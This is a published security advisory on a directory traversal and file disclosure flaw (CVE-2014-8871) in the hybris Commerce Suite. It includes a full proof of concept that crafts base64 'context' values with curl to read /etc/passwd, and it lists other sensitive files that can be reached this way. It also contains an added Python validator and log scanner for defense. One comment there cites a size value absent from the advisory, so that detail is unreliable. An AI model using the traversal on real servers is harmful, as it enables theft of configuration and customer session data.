[RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite
2015-02-22T00:00:00
ID SECURITYVULNS:DOC:31726 Type securityvulns Reporter Securityvulns Modified 2015-02-22T00:00:00
Description
Advisory: Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite
During a penetration test, RedTeam Pentesting discovered a Directory
Traversal vulnerability in the hybris Commerce Software Suite. This
vulnerability allows attackers to download arbitrary files of any size
from the affected system.

Details

Product: hybris Commerce Software Suite
Affected Versions:
 Release 5.3: <= 5.3.0.1
 Release 5.2: <= 5.2.0.3
 Release 5.1.1: <= 5.1.1.2
 Release 5.1: <= 5.1.0.1
 Release 5.0.4: <= 5.0.4.4
 Release 5.0.3: <= 5.0.3.3
 Release 5.0.0: <= 5.0.0.3
Fixed Versions:
 Release 5.3: 5.3.0.2
 Release 5.2: 5.2.0.4
 Release 5.1.1: 5.1.1.3
 Release 5.1: 5.1.0.2
 Release 5.0.4: 5.0.4.5
 Release 5.0.3: 5.0.3.4
 Release 5.0.0: 5.0.0.4
Vulnerability Type: Directory Traversal, Arbitrary File Disclosure
Security Risk: high
Vendor URL: http://www.hybris.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-016
Advisory Status: published
CVE: CVE-2014-8871
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8871
Introduction

"hybris delivers a commerce software suite that is best in class,
helping a company execute all its direct selling processes and present a
single view and a unified experience to all its customers."
(from the vendor's homepage)
More Details
Webshops based on hybris may use an image retrieval system where images
are identified by a URL parameter named "context" rather than by a file
name. When this system is used, images are referenced e.g. like the
following:

<img src="/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBl
Z3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3
YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]" width="200" />
Changing the file name part of the URL from "image.jpg" to e.g.
"redteam.jpg" reveals that it is not the file name part of the URL but
the value of the parameter "context" that selects the desired file.
A closer look at the parameter shows that its value is encoded as
Base64. Decoding it reveals a pipe-separated data structure which
includes a file size (third value), a file name (fifth value) and a
SHA-256 hash (sixth value):

$ echo -n "bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpw\
Z3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk\
1OTkxYjc4NTJiODU1" | base64 -d

master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298fc1c149afbf4c89
96fb92427ae41e4649b934ca495991b7852b855
During the penetration test, many parameters were inspected, and it
turned out that the SHA-256 hash references a particular version of the
file and can be replaced by a dash ("-") character, which always returns
the latest version. The example request can be modified accordingly and
requested with curl as follows:

$ echo -n "master|root|12345|image/jpeg|7415687361172.jpg|-" | base64
bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt
$ curl -I http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R\
8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt
It was verified that the file name (fifth) value is vulnerable to
directory traversal. This enables attackers to retrieve the contents of
other files from the server's filesystem by using sequences of "../".
The following HTTP request, for example, delivers the contents of the
file "/etc/passwd":

$ echo -n "master|root|12345|text/plain|../../../../../../etc/passwd|-"\
 | base64 -w0
bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFz
c3dkfC0=

$ curl http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MT\
IzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[...]
The size included in the third field of the data structure is used to
limit the number of bytes returned for a file. As it can be modified by
attackers, files of any size with arbitrary content can be downloaded,
provided the path to the file on the server is known. This enables
attackers to read, among others, the environment of the current process
at /proc/self/environ and the list of memory maps including the full
paths to loaded libraries at /proc/self/maps. This way, knowledge about
a particular instance of hybris can be gathered. Afterwards it is
possible to access configuration files like "local.properties" and the
log files for shop orders which also contain the current session-IDs of
users. Furthermore, the Java bytecode of hybris can be downloaded and
decompiled.
Implement a new filter which validates file names and insert this filter
before hybris' own MediaFilter. The new filter should return an error
when a file outside the media directory is requested.
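The workaround above calls for a filter that validates the file name before hybris' own MediaFilter sees the request. The following Python is an added example, not code from RedTeam Pentesting or from hybris: it decodes the "context" structure described above, applies the checks such a filter needs (size cap, allow-listed path components, canonical-path containment under the media directory) and runs the same checks over constructed access-log lines so that past requests can be reviewed. The media root path, the size cap and the on-disk layout folder/subfolder/name are assumptions.

```python
import base64
import binascii
import os
import re
from urllib.parse import unquote, urlsplit

# Assumptions (not from the advisory): where media files live on disk and
# the largest file a media request may legitimately ask for.
MEDIA_ROOT = "/opt/hybris/data/media"
MAX_MEDIA_BYTES = 50 * 1024 * 1024

# Field order of the pipe-separated structure as laid out in the advisory:
# size is the third value, file name the fifth, SHA-256 hash the sixth.
FIELD_NAMES = ("folder", "subfolder", "size", "mime", "name", "hash")
SAFE_COMPONENT = re.compile(r"[A-Za-z0-9_.-]+")


def decode_context(value):
    """Decode a "context" parameter into its six fields.

    The advisory's own URLs drop the trailing '=' of the base64 value, so
    padding is restored before decoding; anything that is not clean
    standard-alphabet base64 is rejected instead of silently skipped.
    """
    padded = value + "=" * (-len(value) % 4)
    try:
        raw = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"context is not valid base64: {exc}") from None
    fields = raw.split("|")
    if len(fields) != len(FIELD_NAMES):
        raise ValueError(f"expected {len(FIELD_NAMES)} fields, got {len(fields)}")
    return dict(zip(FIELD_NAMES, fields))


def validate_context(fields, media_root=MEDIA_ROOT, max_bytes=MAX_MEDIA_BYTES):
    """Return the reasons a decoded context must be refused; [] means allowed."""
    problems = []
    # Third field: the byte count the server streams back. The advisory's
    # PoC raises it to 200000000 to get whole files, so cap it.
    if not fields["size"].isdigit() or int(fields["size"]) > max_bytes:
        problems.append("size field is not a sane byte count")
    # Path components: an allow-list keeps '/', '\\' and '..' from ever
    # reaching the file system layer.
    for key in ("folder", "subfolder", "name"):
        if not SAFE_COMPONENT.fullmatch(fields[key]) or fields[key] in (".", ".."):
            problems.append(f"{key} field contains characters outside the allow-list")
    # Defence in depth: canonicalise the would-be path (symlinks included)
    # and require that it still lies below the media root. An absolute
    # component would make os.path.join discard the root, which this
    # check also catches.
    root = os.path.realpath(media_root)
    target = os.path.realpath(
        os.path.join(root, fields["folder"], fields["subfolder"], fields["name"])
    )
    if os.path.commonpath([root, target]) != root:
        problems.append("resolved path escapes the media root")
    # Sixth field: a SHA-256 hex digest or the '-' marker for "latest".
    if not re.fullmatch(r"[0-9a-f]{64}|-", fields["hash"]):
        problems.append("hash field is neither SHA-256 hex nor '-'")
    return problems


# Constructed access-log lines (not from the advisory) in common log format:
# one ordinary image request, one carrying the advisory's /etc/passwd context.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Feb/2015:10:00:01 +0100] "GET /medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt HTTP/1.1" 200 12345
10.0.0.9 - - [18/Feb/2015:10:00:02 +0100] "GET /medias/redteam?context=bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0 HTTP/1.1" 200 1337
"""

REQUEST_RE = re.compile(r'"(?:GET|HEAD) (\S+) HTTP/')
CONTEXT_RE = re.compile(r"[?&]context=([^&\s]*)")


def scan_access_log(text):
    """Return (client, file name, problems) for every /medias request whose
    context fails validation, so existing logs can be checked for past abuse."""
    hits = []
    for line in text.splitlines():
        request = REQUEST_RE.search(line)
        if not request or not urlsplit(request.group(1)).path.startswith("/medias/"):
            continue
        ctx = CONTEXT_RE.search(request.group(1))
        if not ctx:
            continue
        # unquote(), not unquote_plus(): '+' is a base64 character here and
        # must survive; only percent-escapes are decoded.
        try:
            fields = decode_context(unquote(ctx.group(1)))
            name, problems = fields["name"], validate_context(fields)
        except ValueError as exc:
            name, problems = "?", [str(exc)]
        if problems:
            hits.append((line.split()[0], name, problems))
    return hits


if __name__ == "__main__":
    for client, name, problems in scan_access_log(SAMPLE_LOG):
        print(f"{client}: {name!r} -> {'; '.join(problems)}")
```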
Fix
Upgrade to a fixed hybris version or apply the vendor's hot fix.
Security Risk
This vulnerability can be used to download files from the file system of
the server. This includes, among others, configuration files and the
hybris order logfile, which contains sensitive data. Therefore, the
vulnerability poses a high risk.
Timeline
2014-10-08 Vulnerability identified
2014-10-08 Customer notified vendor
2014-10-29 Vendor released fixed version
2014-11-11 CVE number requested
2014-11-12 Vendor requests more time to notify their customers
2014-11-14 CVE number assigned
2014-12-08 Vendor again requests more time to notify customers
2015-01-12 Vendor notifies customers again, agrees to release advisory on 2015-02-18
2015-02-17 Vendor requests more time to notify customers for the 3rd time, RedTeam Pentesting declines
2015-02-18 Advisory released
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.
As there are only a few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.
